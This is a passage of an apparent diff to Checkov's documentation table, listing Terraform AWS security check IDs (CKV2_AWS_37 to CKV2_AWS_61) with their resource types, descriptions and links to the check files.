CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1424 | CKV2_AWS_37 | resource | aws_vpc | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1425 | 
CKV2_AWS_37 | resource | aws_vpc_dhcp_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1426 | CKV2_AWS_37 | resource | aws_vpc_dhcp_options_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1427 | CKV2_AWS_37 | resource | aws_vpc_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1428 | CKV2_AWS_37 | resource | aws_vpc_endpoint_connection_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1429 | CKV2_AWS_37 | resource | aws_vpc_endpoint_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1430 | CKV2_AWS_37 | resource | aws_vpc_endpoint_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1431 | CKV2_AWS_37 | resource | aws_vpc_endpoint_service_allowed_principal | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1432 | CKV2_AWS_37 | resource | aws_vpc_endpoint_subnet_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1433 | CKV2_AWS_37 | resource | aws_vpc_ipv4_cidr_block_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1434 | CKV2_AWS_37 | resource | aws_vpc_peering_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1435 | CKV2_AWS_37 | resource | aws_vpc_peering_connection_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1436 | CKV2_AWS_37 | resource | aws_vpc_peering_connection_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1437 | CKV2_AWS_37 | resource | aws_vpn_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1438 | CKV2_AWS_37 | resource | aws_vpn_connection_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1439 | CKV2_AWS_37 | resource | aws_vpn_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1440 | CKV2_AWS_37 | resource | aws_vpn_gateway_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1441 | CKV2_AWS_37 | resource | aws_vpn_gateway_route_propagation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1442 | CKV2_AWS_37 | resource | aws_waf_byte_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1443 | CKV2_AWS_37 | resource | aws_waf_geo_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1444 | CKV2_AWS_37 | resource | aws_waf_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1445 | CKV2_AWS_37 | resource | aws_waf_rate_based_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1446 | CKV2_AWS_37 | resource | aws_waf_regex_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1447 | CKV2_AWS_37 | resource | aws_waf_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1448 | CKV2_AWS_37 | resource | aws_waf_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1449 | CKV2_AWS_37 | resource | aws_waf_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1450 | CKV2_AWS_37 | resource | aws_waf_size_constraint_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1451 | CKV2_AWS_37 | resource | aws_waf_sql_injection_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1452 | CKV2_AWS_37 | resource | aws_waf_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1453 | CKV2_AWS_37 | resource | aws_waf_xss_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1454 | CKV2_AWS_37 | resource | aws_wafregional_byte_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1455 | CKV2_AWS_37 | resource | aws_wafregional_geo_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1456 | CKV2_AWS_37 | resource | aws_wafregional_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1457 | CKV2_AWS_37 | resource | aws_wafregional_rate_based_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1458 | CKV2_AWS_37 | resource | aws_wafregional_regex_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1459 | CKV2_AWS_37 | resource | aws_wafregional_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1460 | CKV2_AWS_37 | resource | aws_wafregional_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1461 | CKV2_AWS_37 | resource | aws_wafregional_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1462 | CKV2_AWS_37 | resource | aws_wafregional_size_constraint_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1463 | CKV2_AWS_37 | resource | aws_wafregional_sql_injection_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1464 | CKV2_AWS_37 | resource | aws_wafregional_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1465 | CKV2_AWS_37 | resource | aws_wafregional_web_acl_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1466 | CKV2_AWS_37 | resource | aws_wafregional_xss_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1467 | CKV2_AWS_37 | resource | aws_wafv2_ip_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1468 | CKV2_AWS_37 | resource | aws_wafv2_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1469 | CKV2_AWS_37 | resource | aws_wafv2_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1470 | CKV2_AWS_37 | resource | aws_wafv2_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1471 | CKV2_AWS_37 | resource | aws_wafv2_web_acl_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1472 | CKV2_AWS_37 | resource | aws_wafv2_web_acl_logging_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1473 | CKV2_AWS_37 | resource | aws_worklink_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1474 | CKV2_AWS_37 | resource | aws_worklink_website_certificate_authority_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1475 | CKV2_AWS_37 | resource | aws_workspaces_directory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1476 | CKV2_AWS_37 | resource | aws_workspaces_ip_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1477 | CKV2_AWS_37 | resource | aws_workspaces_workspace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1478 | CKV2_AWS_37 | resource | aws_xray_sampling_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1479 | CKV2_AWS_38 | resource | aws_route53_zone | Ensure Domain Name System Security Extensions (DNSSEC) signing is enabled for Amazon Route 53 public hosted zones | Terraform | [Route53ZoneEnableDNSSECSigning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneEnableDNSSECSigning.yaml) |
+| 1480 | CKV2_AWS_39 | resource | aws_route53_zone | Ensure Domain Name System (DNS) query logging is enabled for Amazon Route 53 hosted zones | Terraform | [Route53ZoneHasMatchingQueryLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneHasMatchingQueryLog.yaml) |
+| 1481 | CKV2_AWS_40 | resource | aws_iam_group_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) |
+| 1482 | CKV2_AWS_40 | resource | aws_iam_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) |
+| 1483 | CKV2_AWS_40 | resource | aws_iam_role_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) |
+| 1484 | CKV2_AWS_40 | resource | aws_iam_user_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) |
+| 1485 | CKV2_AWS_40 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) |
+| 1486 | CKV2_AWS_40 | resource | data.aws_iam_policy_document | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) |
+| 1487 | CKV2_AWS_41 | resource | aws_instance | Ensure an IAM role is attached to EC2 instance | Terraform | [EC2InstanceHasIAMRoleAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EC2InstanceHasIAMRoleAttached.yaml) |
+| 1488 | CKV2_AWS_42 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront distribution uses custom SSL certificate | Terraform | [CloudFrontHasCustomSSLCertificate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasCustomSSLCertificate.yaml) |
+| 1489 | CKV2_AWS_43 | resource | aws_s3_bucket_acl | Ensure S3 Bucket does not allow access to all Authenticated users | Terraform | [S3NotAllowAccessToAllAuthenticatedUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3NotAllowAccessToAllAuthenticatedUsers.yaml) |
+| 1490 | CKV2_AWS_44 | resource | aws_route | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic | Terraform | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml) |
+| 1491 | CKV2_AWS_44 | resource | aws_route_table | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic | Terraform | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml) |
+| 1492 | CKV2_AWS_45 | resource | aws_config_configuration_recorder | Ensure AWS Config recorder is enabled to record all supported resources | Terraform | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml) |
+| 1493 | CKV2_AWS_45 | resource | aws_config_configuration_recorder_status | Ensure AWS Config recorder is enabled to record all supported resources | Terraform | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml) |
+| 1494 | CKV2_AWS_46 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront Distribution with S3 have Origin Access set to enabled | Terraform | [CLoudFrontS3OriginConfigWithOAI.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CLoudFrontS3OriginConfigWithOAI.yaml) |
+| 1495 | CKV2_AWS_47 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability | Terraform | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml) |
+| 1496 | CKV2_AWS_47 | resource | aws_wafv2_web_acl | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability | Terraform | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml) |
+| 1497 | CKV2_AWS_48 | resource | aws_config_configuration_recorder | Ensure AWS Config must record all possible resources | Terraform | [ConfigRecorderRecordsAllGlobalResources.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ConfigRecorderRecordsAllGlobalResources.yaml) |
+| 1498 | CKV2_AWS_49 | resource | aws_dms_endpoint | Ensure AWS Database Migration Service endpoints have SSL configured | Terraform | [DMSEndpointHaveSSLConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/DMSEndpointHaveSSLConfigured.yaml) |
+| 1499 | CKV2_AWS_50 | resource | aws_elasticache_replication_group | Ensure AWS ElastiCache Redis cluster with Multi-AZ Automatic Failover feature set to enabled | Terraform | [ElastiCacheRedisConfiguredAutomaticFailOver.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElastiCacheRedisConfiguredAutomaticFailOver.yaml) |
+| 1500 | CKV2_AWS_51 | resource | aws_api_gateway_stage | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) |
+| 1501 | CKV2_AWS_51 | resource | aws_apigatewayv2_api | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) |
+| 1502 | CKV2_AWS_51 | resource | aws_apigatewayv2_stage | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) |
+| 1503 | CKV2_AWS_52 | resource | aws_elasticsearch_domain | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled | Terraform | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml) |
+| 1504 | CKV2_AWS_52 | resource | aws_opensearch_domain | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled | Terraform | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml) |
+| 1505 | CKV2_AWS_53 | resource | aws_api_gateway_method | Ensure AWS API gateway request is validated | Terraform | [APIGatewayRequestParameterValidationEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayRequestParameterValidationEnabled.yaml) |
+| 1506 | CKV2_AWS_54 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront distribution is using secure SSL protocols for HTTPS communication | Terraform | [CloudFrontUsesSecureProtocolsForHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontUsesSecureProtocolsForHTTPS.yaml) |
+| 1507 | CKV2_AWS_55 | resource | aws_emr_cluster | Ensure AWS EMR cluster is configured with security configuration | Terraform | [EMRClusterHasSecurityConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EMRClusterHasSecurityConfiguration.yaml) |
+| 1508 | CKV2_AWS_56 | resource | aws_iam_group_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) |
+| 1509 | CKV2_AWS_56 | resource | aws_iam_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) |
+| 1510 | CKV2_AWS_56 | resource | aws_iam_role | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) |
+| 1511 | CKV2_AWS_56 | resource | aws_iam_role_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) |
+| 1512 | CKV2_AWS_56 | resource | aws_iam_user_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) |
+| 1513 | CKV2_AWS_56 | resource | aws_ssoadmin_managed_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) |
+| 1514 | CKV2_AWS_56 | resource | data.aws_iam_policy | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) |
+| 1515 | CKV2_AWS_57 | resource | aws_secretsmanager_secret | Ensure Secrets Manager secrets should have automatic rotation enabled | Terraform | [SecretsAreRotated.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SecretsAreRotated.yaml) |
+| 1516 | CKV2_AWS_58 | resource | aws_neptune_cluster | Ensure AWS Neptune cluster deletion protection is enabled | Terraform | [NeptuneDeletionProtectionEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NeptuneDeletionProtectionEnabled.yaml) |
+| 1517 | CKV2_AWS_59 | resource | aws_elasticsearch_domain | Ensure ElasticSearch/OpenSearch has dedicated master node enabled | Terraform | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml) |
+| 1518 | CKV2_AWS_59 | resource | aws_opensearch_domain | Ensure ElasticSearch/OpenSearch has dedicated master node enabled | Terraform | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml) |
+| 1519 | CKV2_AWS_60 | resource | aws_db_instance | Ensure RDS instance with copy tags to snapshots is enabled | Terraform | [RDSEnableCopyTagsToSnapshot.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSEnableCopyTagsToSnapshot.yaml) |
+| 1520 | CKV2_AWS_61 | resource | aws_s3_bucket | Ensure that an S3 bucket has a lifecycle configuration | Terraform | [S3BucketLifecycle.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLifecycle.yaml) |
